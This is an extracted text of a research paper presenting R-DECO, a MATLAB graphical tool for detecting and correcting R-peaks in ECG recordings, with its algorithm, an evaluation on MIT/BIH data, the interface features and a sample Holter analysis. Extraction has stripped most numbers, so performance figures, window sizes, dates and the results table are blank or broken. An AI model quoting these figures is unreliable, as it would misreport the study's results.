ecg analysis algorithms (kohler, hennig & orglmeister, ). once these have been identified, more elaborated analyses can be performed, such as heart rate variability (hrv). how to cite this article moeyersons j, amoni m, van huffel s, willems r, varon c. . r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted september published october corresponding author jonathan moeyersons, jonathan.moeyersons@esat. kuleuven.be academic editor eibe frank additional information and declarations can be found on page doi . /peerj-cs. copyright moeyersons et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:jonathan.�moeyersons@�esat.�kuleuven.�be mailto:jonathan.�moeyersons@�esat.�kuleuven.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ four decades of automated qrs detection research has resulted in a variety of methods using different approaches. these methods can be stratified based on derivatives, digital filters, wavelet-transforms, classifiers, etc. (pan & tompkins, ; dohare, kumar & kumar, ; fujii et al., ; sharma & sunkaria, ; chen, chen & chan, ). despite the wide methodological variety, most of these qrs detectors have the same algorithmic structure. this can be divided in two steps: pre-processing and decision making (kohler, hennig & orglmeister, ). 
in the pre-processing step the qrs-complex is highlighted and the other signal components are suppressed to facilitate the detection. the resulting signal is then used to detect the occurrence of qrs-complexes in the decision making step. this is done by using either fixed or adaptive thresholds. despite high detection rates, some qrs-complexes remain undetected. reasons for this might be small amplitudes, wide complexes or contamination by noise (arzeno, deng & poon, ). therefore, in many algorithms an extra post-processing step is added for the exact determination of the temporal location of the detected qrs-complex. one of the most established qrs detection algorithms is the pan–tompkins algorithm (pan & tompkins, ). although it was developed in the eighties, it achieves comparable performance to many more elaborate algorithms (elgendi et al., ). in this paper, an envelope-based procedure that enhances the qrs-complexes and flattens the rest of the ecg is used in combination with an adapted version of the threshold-based approach of the pan–tompkins algorithm. this method, which was proposed by our group in varon et al. ( ), combines the simplicity of an envelope-based procedure, while maintaining the accuracy of many more elaborate methods. figure a normal heartbeat as recorded by an ecg. the qrs-complex can be observed in the center. the detection of this complex is crucial for almost all ecg analysis algorithms. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in a review paper, elgendi et al. ( ) have compared the results of beat detection algorithms on the mit-bih arrhythmia database. when comparing the results of the automated algorithms with expert annotations, they have shown that many algorithms obtained excellent accuracy. however, none of the algorithms reached perfection. this means that, no matter how good the qrs detection algorithm is, it is highly likely that not all annotations are correct. therefore, it is recommended to visually inspect and review each signal before further analysis (pichot et al., ). many of the existing ecg toolboxes have focussed on the derivation of hrv-analysis parameters from rr-intervals, the time between subsequent r-peaks. this makes sense, since most of the available hardware include some kind of qrs-complex detection algorithm. however, this does not necessarily mean that the output of these devices are the raw rr-intervals. many of these devices have a built-in post-processing algorithm, which compensates for false detections by averaging over a certain range of rr-intervals (niskanen et al., ; pichot et al., ; vicente et al., ). however, for some analyses, such as ecg derived respiration (edr) or beat-to-beat variability of repolarization (bvr), it is of utmost importance that the actual r-peak of the qrs-complex is detected. therefore, it is necessary to visualize the actual r-peak positions in the ecg signal and allow the possibility to make manual adaptations. in this paper, we present r-deco, a matlab-based, graphical user interface (gui) for the detection and correction of r-peaks. this user interface includes the developed r-peak detection algorithm and provides the user with the possibility to correct possible false detections in a very straightforward way. 
r-deco was developed by the biomedical data processing research team (biomed) at the department of electrical engineering (esat) of ku leuven. the software is freely available for windows operating systems at https://gitlab.esat.kuleuven.be/biomed-public/r-deco. the objective of this paper is to provide a detailed description of r-deco, including the proposed r-peak detection algorithm and an overview of the different possibilities of this new software. computational methods r-peak detection we developed an r-peak detection algorithm that is based on an enveloping procedure. it achieves a . % sensitivity and . % positive predictive value (ppv) on the mit/bih arrhythmia database (moody & mark, ). the algorithm can be divided in three steps: pre-processing, decision and post-processing. pre-processing the pre-processing consists of an enveloping procedure, which enhances the qrs-complexes and flattens the rest of the ecg (varon et al., ). a visual explanation of the method is shown in fig. . first, the upper (u) and lower (l) envelopes are computed from the ecg signal by the secant method. this method selects the segment with the steepest positive and negative slope in a user-defined window with length t. once u and l are obtained, they are used to moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ derive a flattened version of the ecg signal (f): f = u - l. since l is subtracted from u, the baseline is eliminated and only a positive signal, f, remains. decision the locations of the qrs-complexes are found by detecting the peaks in the flattened ecg. these peaks are detected in three stages. first, all samples with an amplitude lower than the amplitude of the sample ms further are selected. the ms step size was experimentally defined. this results in the selection of the upward slopes. as a second step, only the upward slopes that are longer than the step size are selected in order to exclude small peaks. finally, the maximum is selected in a window, with a length equal to the step size, that starts from the last selected sample of the upward slope. a graphical representation of this process is shown in fig. . on this selection of peaks, the adaptive thresholding procedure of the pan–tompkins algorithm is applied to define the peaks that correspond to the qrs-complexes. post-processing the thresholding procedure generally produces satisfactory results for the detection of the qrs-complexes. however, some of the automatically generated rr-intervals might be physiologically unreasonable and need to be removed for further analysis. a slightly modified version of the search-back procedure as proposed in de chazal et al. ( ) was used for this purpose. once the positions of the qrs-complexes are identified, the original ecg is used to find the exact location of the r-peaks. the search for an r-peak is performed up to ms from the peak in the flattened signal. this extra search is necessary because the presence of large s-waves might shift the peak in the flattened signal toward the valley of the s-wave. figure enveloping procedure. the flattened ecg (f) is constructed by subtracting the lower envelope (l) from the upper envelope (u). this enhances the qrs-complex and flattens the rest of the ecg signal. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
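the following numpy sketch illustrates the flattening and peak-selection idea described above. it is an approximation for illustration only: the secant-method envelopes are replaced by sliding maximum/minimum filters, the pan–tompkins adaptive thresholding is reduced to a single fixed threshold, and the window lengths are example values rather than the ones used in r-deco:

```python
import numpy as np

# rough numpy sketch of the flattening and peak-selection idea described above.
# assumptions for this illustration: the secant-method envelopes are replaced by
# sliding max/min filters, the pan-tompkins adaptive thresholding is reduced to
# one fixed threshold, and all window lengths are example values.
def flatten_ecg(ecg, fs, win_s=0.3):
    w = max(2, int(win_s * fs))
    padded = np.pad(ecg, (w // 2, w - w // 2 - 1), mode="edge")
    windows = np.lib.stride_tricks.sliding_window_view(padded, w)
    return windows.max(axis=1) - windows.min(axis=1)     # f = u - l

def pick_r_peak_candidates(ecg, fs, step_ms=30.0):
    f = flatten_ecg(ecg, fs)
    step = max(1, int(step_ms * 1e-3 * fs))
    rising = f[:-step] < f[step:]                        # samples lying on an upward slope
    peaks, i = [], 0
    while i < rising.size:
        if rising[i]:
            j = i
            while j < rising.size and rising[j]:
                j += 1
            if j - i >= step:                            # ignore slopes shorter than the step
                window = f[j:j + step]                   # search window after the slope
                peaks.append(j + int(np.argmax(window)))
            i = j
        else:
            i += 1
    peaks = np.asarray(peaks, dtype=int)
    if peaks.size:                                       # crude stand-in for adaptive thresholding
        peaks = peaks[f[peaks] > 0.4 * np.max(f[peaks])]
    return peaks    # the original ecg is then searched around each candidate for the exact r-peak
```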
https://peerj.com/computer-science/ evaluation on the physionet mit/bih arrhythmia database we used the mit/bih arrhythmia database to evaluate the proposed algorithm (moody & mark, ). this dataset consists of half-hour ecg signals, which were recorded in the boston’s beth israel hospital between and . all recordings were annotated by two independent cardiologists who also made a distinction between normal and abnormal beats. in total, , heartbeats were annotated, of which , were labeled as normal. each recording contains two channel ecg signals with a sampling frequency of hz. in most records, one channel is lead ii and the other channel is v . however, we only used the first channel for the evaluation. as mentioned previously, the pre-processing consists of a flattening step of the ecg with a user-defined window width. to evaluate the sensitivity of the performance to the choice of the width we have tested multiple window widths. as can be observed from fig. , comparable results were obtained for window widths between and ms. in table we list the r-peak detection results of the proposed algorithm with an envelope width of ms and without post-processing. we obtained an overall sensitivity of . % and ppv of . %. when including the post-processing, we obtained an overall sensitivity of . % and ppv of . %. these results are comparable with those in literature, especially with the pan–tompkins algorithm, which reaches a sensitivity of . % and a ppv of . % (elgendi et al., ). while these results are very promising, we can also observe that for some recordings only moderate detection results are achieved. this decrease in performance is generally due to loss of signal, unusual morphology or stretches of extremely irregular rhythms. for instance, recording and contain stretches where the signal is lost in the first channel. however, the recordings with the highest amount of false detections are , figure procedure to select r-peaks. the resulting flat ecg denoted f is indicated by the black line. the samples with an amplitude lower than the sample ms further are indicated by the magenta circles, with the last sample indicated by the green circle. the search window is indicated by the green line. the selected r-peaks are indicated by the black circles. a.u. stands for arbitrary units. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and . correctly detecting the r-peaks in recording has been proven difficult for many algorithms (pan & tompkins, ). it contains a lot of baseline wander and additionally, very tall and sharp p-waves. these characteristics make it difficult to distinguish p-waves from r-peaks and thus result in a high false positive count. however, the highest amount of false positives is observed in recording ( . % sensitivity). this might be explained by the extremely high percentage of premature ventricular contractions (pvc) present in the recording, almost %. since the envelope width was fixed during the detection process, one may assume that the performance could be improved if manual adjustments were permitted. this holds as well for other records with pvc’s, such as record . the noise tolerance of the algorithm was evaluated with the mit-bih noise stress test database (moody, muldrow & mark, ). we observed that both median ppv and sensitivity remained around % above a signal-to-noise-ratio of six db. 
from this threshold the performance of the algorithm decreased significantly. from the analysis of the results, we could deduce two main factors that influence the results of the algorithm: ( ) the envelope width and ( ) the rr post-processing. the number of samples in the envelope is important, since it can be regarded as a filter of the rr-intervals. smaller envelope widths might result in the enhancement of more peaks than only the r-peaks. this might be beneficial in the case of small r-peaks, but might also enhance artefact peaks. larger envelope widths might cause adjacent r-peaks to be merged in the flattened signal. in practice, this might result in the failure to detect premature heartbeats, which appear shortly after the previous heartbeat. figure performance of the algorithm, compared to the choice of window width: (a) the positive predictive value and (b) the sensitivity of the algorithm. a window width between and ms results in the best performance. table performance of the r-peak detection algorithm on the physionet mit/bih dataset (per record: total beats, tp (beats), fp (beats), fn (beats), se (%) and ppv (%)). in summary, a larger envelope width results in fewer false positives and more false negatives, and the opposite is true for a small envelope width. a similar effect can be observed when the rr-intervals are post-processed. this increases the certainty of detection of the algorithm and thus results in fewer false positives. the downside is that, in the presence of abnormal rhythms, it also results in more false negatives. software description. the algorithms have been implemented with matlab r a. we used guide, matlab's gui development environment, to design the gui of r-deco. the current subsection describes the possible input data formats and the user interface. input data formats. the standard input of the toolbox is raw or filtered ecg data. this can be both single- or multichannel ecg. since a plethora of open formats exist for storing the ecg, it would be impossible to write supporting software for all formats (niskanen et al., ). therefore, we focussed on the data formats that are most commonly used by our clinical partners in the cardiology department of the uz leuven, belgium. the following file formats are supported: ishne-holter files (.ecg), matlab files (.mat), european data format files (.edf), text files (.txt) and excel files (.xls or .csv). an ishne-holter file is organized in a header record, followed by a data block that contains all digital ecg samples. this file format was developed to facilitate data exchange and research in the field of holter (badilini, ). the software automatically extracts all ecg channels and also the sampling frequency. a matlab formatted file can contain one variable, up to an entire workspace. therefore, if the file contains more than one variable, the user is prompted to select the variable containing the ecg signal.
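the variable-selection behaviour described above can be mimicked outside matlab as well; the sketch below (python with scipy, not r-deco's own code; the file name and variable name are hypothetical) lists the variables stored in a .mat file and returns the one chosen as the ecg:

```python
from scipy.io import loadmat

# illustration of the behaviour described above (not r-deco's own code): list the
# variables stored in a matlab file and return the one chosen as the ecg. the file
# name "recording.mat" and the variable name "ecg_lead_ii" are hypothetical.
def load_ecg_from_mat(path, variable=None):
    contents = loadmat(path, squeeze_me=True)
    candidates = [k for k in contents if not k.startswith("__")]   # skip matlab metadata keys
    if variable is None:
        if len(candidates) != 1:
            raise ValueError("several variables found, choose one of: %s" % candidates)
        variable = candidates[0]
    return contents[variable]

# ecg = load_ecg_from_mat("recording.mat", variable="ecg_lead_ii")
```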
in the specific case that the selected file is a structure, the software allows to search within the structure until the ecg signal is selected. table (continued). record total (beats) tp (beats) fp (beats) fn (beats) se (%) ppv (%) , , . . , , , , , , . , , . , , . total , , . . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a standard european data format, edf, file consists of a header record and the data records (kemp et al., ). it was originally intended for the digital storage and exchange of eeg and polysomnogram recordings, but currently it can store a variety of annotations and signals, such as emg, ecg and many more (kemp & olivan, ). since not all edf files have the same standard labels, the user is prompted to identify the ecg channel(s). additionally, the software attempts to identify the sampling frequency of the selected signal by scanning the file. as an extra feature, the software allows the user to load a session. when the current session is interrupted, the session can be saved as a matlab file. it includes all the analysis parameters, the ecg signal and the rr-intervals, if computed. when a previous session is loaded, the software restores the entire user interface to the moment on which the session was saved. this allows the user to pause and continue, whenever wanted. user interface the strength of this toolbox is that everything is operated through a single gui. as shown in fig. , it can be divided in five segments: data, filter, analysis period, r-peak detection and r-peak correction. all segments are described below. data in the data panel, the user has the option to load data in two different ways: from a file or from the matlab workspace. both can be accessed via the respective pushbuttons. figure the graphical user interface of r-deco. the user interface can be divided in five segments: (a) data, (b) filter, (c) analysis period, (d) r-peak detection and (e) r-peak correction. the ecg signal and the resulting tachogram are shown in respectively (f) and (g). the detected r-peaks are depicted as small blue circles. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ when a file is selected, the software visualizes a small segment of the ecg signal. if the signal is inverted, the user can indicate this and the file will be inverted before further analysis. the software also scans the selected file for the sampling frequency. if this is not found, the software prompts the user to manually indicate the sampling frequency. finally, the data panel also contains a reset button. this button allows the user to reset the entire gui. it empties all plots, restores all default variables and deletes all results. if the user has not yet saved the current analysis, the user is prompted to confirm the reset action to prevent unwanted loss of information. filter since ecg signals can be contaminated with noise, filtering is often essential for further analysis. r-deco provides three basic filters: high pass, low pass and a notch filter. the high pass filter consists of a zero phase, second order butterworth filter. the low pass filter consists of a zero phase, fourth order butterworth filter. finally, a zero phase notch filter is also included. the latter could be used to remove the power-line interference. 
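a minimal sketch of these three filters, written with scipy rather than matlab, is shown below; filtfilt provides the zero-phase behaviour, while the cut-off frequencies, the notch frequency and the sampling rate are illustrative assumptions rather than r-deco defaults:

```python
from scipy.signal import butter, filtfilt, iirnotch

# sketch of the three basic filters described above, written with scipy instead of
# matlab. filtfilt provides the zero-phase behaviour; the cut-off frequencies, the
# notch frequency and the sampling rate fs are illustrative assumptions only.
def highpass(ecg, fs, fc=0.5):
    b, a = butter(2, fc / (fs / 2), btype="highpass")    # zero-phase, second order
    return filtfilt(b, a, ecg)

def lowpass(ecg, fs, fc=40.0):
    b, a = butter(4, fc / (fs / 2), btype="lowpass")     # zero-phase, fourth order
    return filtfilt(b, a, ecg)

def notch(ecg, fs, f0=50.0, q=30.0):
    b, a = iirnotch(f0 / (fs / 2), q)                    # removes power-line interference
    return filtfilt(b, a, ecg)

# cleaned = notch(lowpass(highpass(raw_ecg, fs=360.0), fs=360.0), fs=360.0)
```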
important to note is that filtering actions are always executed on the original signal to ensure repeatability. in order to aid the user in the selection of appropriate frequency threshold(s), r-deco is able to compute and display the power spectrum. an estimate of the power spectrum is computed using the welch method (welch, ). as a default, we used a window of samples with % overlap. to visualize the effect of the filtering in the frequency domain, r-deco displays both the filtered and the original power spectrum. furthermore, the effect of the filtering in the time domain can also be investigated by checking the “show original” checkbox. this will overlay the original signal on top of the filtered signal (fig. ). analysis period in the analysis period panel the user has the possibility to define an analysis window. after pushing the “define analysis period” button, the user has to select a window by clicking, dragging and releasing the mouse. the window is shown as a transparent patch over the data and can be enlarged, shrinked or moved with the mouse. after the initial window figure example of a high pass filter. by clicking the “show original” checkbox, the original signal (light blue) is overlaid on the filtered signal (blue). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is drawn, the user can further modify the analysis window by changing the start time and/or the duration of the window. when a window is selected, the user can accept the analysis window by pressing the “apply changes” button. this prompts the x-limits of the graph to match the analysis window and disables the window modifications. from here on, all further analysis will be performed solely on the selected window. all the above is very useful when the to-be-selected time period is known in advance, but this is not always the case. sometimes the selection of the analysis window is depending on certain patterns in the tachogram, hence the tachogram has to be constructed first. therefore, if r-peaks have been detected already, the user is prompted to indicate whether he/she would like to keep the detected r-peaks. r-peak detection the execution of the r-peak detection algorithm, as described in the first section, is initiated when the “detect peaks” button is pushed. however, before the actual algorithm is executed, the user is able to adjust the default parameters of the algorithm. in fig. , an epoch of s of the ecg signal and its respective enveloped signal is shown as an example of the flattening procedure. the user can adjust the envelope size to the desired value and enact the changes by pressing the “apply” button. additionally, an estimation of the average heart rate can be defined to compute the boundaries of normal-to-normal rr-intervals. lastly, the user can select the automatic post-processing of the rr-intervals. since some devices have built-in qrs detection algorithms and some researchers have their own preferred qrs detection algorithm, the software allows to load r-peak locations. these will be displayed the same way the r-peaks of the algorithm are displayed. r-peak correction in case of hrv studies, only the normal-to-normal rr-intervals need to be taken into account. this can be achieved by selecting the ectopic removal option. this option corrects ectopic beats, without altering the normal rr-intervals. 
figure the r-peak parameter selection window. the user can adjust the envelope size, the average heart rate and indicate if rr post-processing is necessary. pressing the default button restores the default values. full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after finishing the detection process, either by detecting or loading the r-peaks, it is still possible that not all r-peaks are accurately detected. in r-deco, the user can make manual and (semi-)automatic adjustments to the r-peak locations. the manual methods are: add, adjust and delete. these methods can be activated by selecting the specific radiobuttons or via a context menu, which is linked to each r-peak. these manual methods allow the user to correct wrong or missing annotations either in all or in individual leads. � add: when this radiobutton is active, new r-peaks can be added by clicking in the ecg graph. the program selects the signal sample that is closest to the mouse position in a symmetric window of ms around the mouse position. upon mouse release, a new r-peak is added and the tachogram is adapted. � adjust: while hovering over the ecg graph, the r-peak closest to the mouse location is selected. after clicking on the desired r-peak, it can be moved by dragging the mouse. the movement of the selected r-peak is restricted by the previous and next r-peak. while adjusting the r-peak location, the tachogram is automatically updated. upon mouse release, the new r-peak location is saved. � delete: while hovering over the ecg graph, the r-peak closest to the mouse location is selected. after clicking on the desired r-peak, more to-be-deleted r-peaks can be selected by dragging the mouse. upon mouse release, the selected r-peaks are removed and the tachogram is adapted. the three (semi-)automatic r-peak correction methods are: cross-correlation, peak conversion and maximum search. � cross correlation: for this method, a symmetrical window of ms around each r-peak is selected. then, all heartbeats are normalized by subtracting the mean and dividing it by the standard deviation. then, a trimmed average qrs-complex is computed of all the positive and “negative” r-peaks. in this work a “negative” r-peak is understood as the absence of an r-peak or the presence of a very prominent s-wave, also described as rs-complex. � the user is prompted to select either the positive or the “negative” average heartbeat. if necessary, the user can also adjust the location of the r-peak on the selected template. this is all graphically displayed as shown in fig. . finally, the cross-correlation of every heartbeat is computed with the trimmed average and the r-peak is re-located, based on the highest correlation value. � peak conversion: the absolute amplitude of every r-peak annotation is compared with the previous and next sample’s absolute amplitude. if it is bigger than the previous and smaller than the next, the location of the r-peak will be shifted forward, until an extremum is obtained. if it is the other way around, the location of the r-peak will be shifted backwards. � this functionality avoids the “jumping” of r-peaks from, for example, an actual r-peak to a pre-mature ventricular contraction, which might be the case when window search is moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ applied. 
furthermore, pressing the button more than once will not affect the relocation after one correction. � maximum search: firstly, a symmetric window of ms around each r-peak is selected. secondly, the user is prompted to select either the maximum, minimum or absolute maximum. based on this selection, the respective extremum within the window is selected as new r-peak location. save and export results by default, the results are saved as a matlab file. this file includes the r-peak locations and the rr-intervals, which can further be used for hrv-, bvr- or any other analysis that requires r-peak detection. additionally, the software can export the results in two different ways: ( ) an excel file and ( ) a matlab file. ( ) excel file (�.xls): a new workbook is created with a general overview of the file on the first sheet: the number of channels, the sampling frequency, the duration of the signal and the duration of the analysis period. the number of additional sheets is defined by the number of channels, since for every channel, a separate sheet is created. this contains the r-peak locations, the rr-intervals and a number of basic metrics, such as the mean heart rate. ( ) matlab file (�.mat): this file contains a single structure named data. in accordance to the structure of the excel file, a structure is created per channel. this contains the signal in the analysis window, the r-peak locations and the rr-intervals. this option is especially useful for further analysis in matlab. data browser in order to graphically correct the r-peaks it is important to have a clear view of the segment to be investigated. therefore, after the r-peaks are detected, the software immediately displays the ecg signal with the r-peak annotations and the respective tachogram, as can be seen in fig. . the window width of the x-axis can be adjusted in three different ways: ( ) the range edit box, ( ) the plus and minus buttons or ( ) by using the zoom button. all three methods also adjust the width of the scroll bar. the scroll bar can be used to slide through the signal. since both axes are linked, both slide at the same time. the limits of the y-axis in both axes are adjusted automatically according to the data within the selected range. however, if the “fix y-limits” checkbox is selected, the range of the y-axis of the tachogram is fixed to the current limits. since some users favor a tachogram that displays the rr-intervals, while others favor hr values, we made it possible to switch between the two. an ecg recording with multiple channels might result in axes that become unclear. therefore, r-deco enables the user to switch view between different channels. this way the user can select one, multiple or all channels. if the channel labels are not present in the signal file, r-deco names and numbers the channels itself: channel , channel , etc. moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, it also provides the possibility to change these names. when the user clicks twice on a channel name in the listbox, a dialog box pops up that allows the user to choose a new name. this will be adjusted in the listbox, and also in the output files. figure the data browsing options of r-deco. full-size doi: . /peerj-cs. /fig- figure the template selection window. the user can select either the positive or “negative” r-peak template and can shift the location of the r-peak if necessary. full-size doi: . /peerj-cs. /fig- moeyersons et al. 
( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an extra feature is the possibility to take “pictures” of the axes. this saves both axes in a format of choice, without including any of the buttons or bars from the user interface. in order to design the axes to the user’s taste, r-deco allows to change the line colors and the grid lines. preferences the analysis settings of r-deco can be adjusted via the preferences menu. note that the changes only apply for the current session and are not saved for the next session. this will be adjusted in a future release. the preference menu can be divided in four segments: power spectrum, filter, detection and correction � power spectrum: all variables of the welch method can be adjusted here. � filter: the type and order of the filter can be defined here. � detection: the default input parameters for the r-peak detection algorithm can be adjusted here. whenever the default button is pressed in the parameter selection window, see fig. , all parameters are reset to the values defined in this segment. � correction: for all correction methods, the user can define the window size in which the new r-peak is supposed to be located. sample run as a sample run, we used a h digital holter signal that was recorded from a male subject with ischaemic heart disease. the idea was to investigate the temporal evolution in bvr before spontaneous non-sustained ventricular tachycardia (nsvt). before analysis could be performed, the nsvt episodes needed to be identified and the r-peaks needed to be detected. once the signal was loaded and the sampling frequency was defined, we first had a look at the power spectrum. according to the plot, no power line interference was present, since we could not observe a peak at or hz. however, it was clear that most of the power was situated in the lower frequency bands. this could indicate the presence of baseline wander. therefore, we high-pass filtered the signal with a cut-off frequency of . hz. the result in the power spectrum can be observed in fig. . next, the nsvt episodes needed to be identified. however, the time stamps of the episodes were not known. therefore, it was necessary to detect the r-peaks first. this way the nsvt episodes could be identified from the tachogram. an example of an nsvt episode, taken with the picture button, can be observed in fig. . based on the example signal, we selected an envelope size of ms, which provided the best results for this signal. this envelope size ensures the enhancement of the qrs- complexes, without skipping any beats. additionally, we indicated that no post-processing of the rr-intervals is wanted, since we wanted to be able to detect nsvt segments as well. the nsvt episodes were identified based on the resulting rr-intervals. from the start of one of these episodes, we selected consecutive heartbeats (thomsen et al., ). only normal-to-normal intervals should be taken into account for bvr-analysis. hence, moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (ventricular) ectopic and post-extrasystolic beats were removed for further analysis, as can be observed in fig. . after the rr-intervals in the wanted analysis window were selected, the analysis results were saved. this was done by selecting “save results” on the menu bar and entering a file name. 
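for readers who post-process the saved results outside matlab, the per-channel export described earlier (r-peak locations, rr-intervals and a small overview sheet) could be reproduced roughly as below. this is a hedged python analogue, not the r-deco export code; the variable names, sheet layout and the use of an excel engine such as openpyxl are assumptions.

```python
import numpy as np
import pandas as pd
from scipy.io import savemat

def export_results(r_peaks_s, out_basename="rpeak_results"):
    """save r-peak times (seconds) and rr-intervals as a .mat struct and
    as a two-sheet excel workbook (overview + one channel)."""
    r_peaks_s = np.asarray(r_peaks_s, dtype=float)
    rr = np.diff(r_peaks_s)
    # matlab-style export: one struct holding locations and intervals
    savemat(out_basename + ".mat", {"data": {"R_loc": r_peaks_s, "RR_int": rr}})
    # excel-style export: overview sheet plus a per-channel sheet
    overview = pd.DataFrame({"mean_rr_s": [rr.mean()],
                             "mean_hr_bpm": [60.0 / rr.mean()]})
    channel = pd.DataFrame({"r_peak_s": r_peaks_s[1:], "rr_interval_s": rr})
    with pd.ExcelWriter(out_basename + ".xlsx") as xls:
        overview.to_excel(xls, sheet_name="overview", index=False)
        channel.to_excel(xls, sheet_name="channel_1", index=False)
```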
the results are then saved as a matlab file and can be loaded for the following bvr-analysis. note that the results can also be exported as an excel file. figure result of the high pass filtering in the power spectrum. full-size doi: . /peerj-cs. /fig- figure example of an nsvt segment with correction (a); the resulting tachogram is shown in (b). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ potential of future growth r-deco is the first step toward a complete ecg processing tool. at the moment, it focusses on accurate r-peak detection and intuitive correction options. therefore, it is a complementary tool for existing hrv-analysis toolboxes, which tend to focus on the computation of hrv metrics from rr-intervals. although some toolboxes already provide the possibility to detect r-peaks, their possibility to correct r-peak annotations is rather limited (pichot et al., ; rodenhauser et al., ; vicente et al., ). additionally, to the best of our knowledge, none of the existing toolboxes provide filtering, r-peak detection and correction all together. the main advantage of r-deco is the easy-to-use, intuitive gui. all actions are performed in one window, which simplifies the use and reduces the learning time. several extra features are being developed and will be released in future versions. we intend to add support for other input file formats, such as hierarchical data format files, general data format files, etc. however, most improvements will be in the number of analysis options. some of the first extra analysis options will be automatic signal quality detection, edr and hrv-analysis. conclusion r-deco is a matlab based gui for detecting and correcting r-peaks in ecg signals. the goal of r-deco is to provide a complete workflow from the raw signal to the tachogram. it includes an accurate r-peak detection algorithm, the performance of which is comparable to the state-of-the-art, and allows the user to graphically correct wrong or missing detections. additionally, r-deco supports a variety of ecg input file formats, figure example of an nsvt segment with correction (a); the resulting tachogram is shown in (b). full-size doi: . /peerj-cs. /fig- moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. which allows the processing of recordings directly from the recording device. this makes it a tool that can be used both by engineers, and clinicians. we included some basic pre-processing options, such as three filters and the possibility to select an analysis window. the analysis results can be exported to the matlab workspace or excel for later analysis. r-deco is available free of charge and can be downloaded from https://gitlab.esat. kuleuven.be/biomed-public/r-deco. acknowledgements matthew amoni is a doctoral fellow of the research foundation-flanders (fwo). carolina varon is a postdoctoral fellow of the research foundation-flanders (fwo). rik willems is a senior clinical investigator of the research foundation-flanders (fwo). 
additional information and declarations funding this work was supported by the bijzonder onderzoeksfonds ku leuven (bof): c / / , c / / ; agentschap innoveren & ondernemen (vlaio): stw osa+, o&o hbc ewatch; belgian foreign affairs-development cooperation: vlir uos programs ( - ); eu: , , , . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: bijzonder onderzoeksfonds ku leuven (bof): c / / , c / / . agentschap innoveren & ondernemen (vlaio): stw osa+, o&o hbc ewatch. belgian foreign affairs-development cooperation: vlir uos programs ( – ). eu: , , , . competing interests the authors declare that they have no competing interests. author contributions � jonathan moeyersons conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � matthew amoni conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � sabine van huffel conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. � rik willems conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � carolina varon conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the codes are available at: moeyersons j, amoni m, van huffel s, willems r, varon c, r-deco: an open-source matlab-based graphical user interface for the detection and correction of r-peaks, under revision, . https://gitlab.esat.kuleuven.be/biomed- public/r-deco. references arzeno nn, deng zd, poon cs. . analysis of first-derivative based qrs detection algorithms. ieee transaction on biomedical engineering ( ): – doi . /tbme. . . badilini f. . the ishne holter standard output file format. annals of noninvasive electrocardiology ( ): – . chen s-w, chen h-c, chan h-l. . a real-time qrs detection method based on moving-averaging incorporating with wavelet denoising. computer methods and programs in 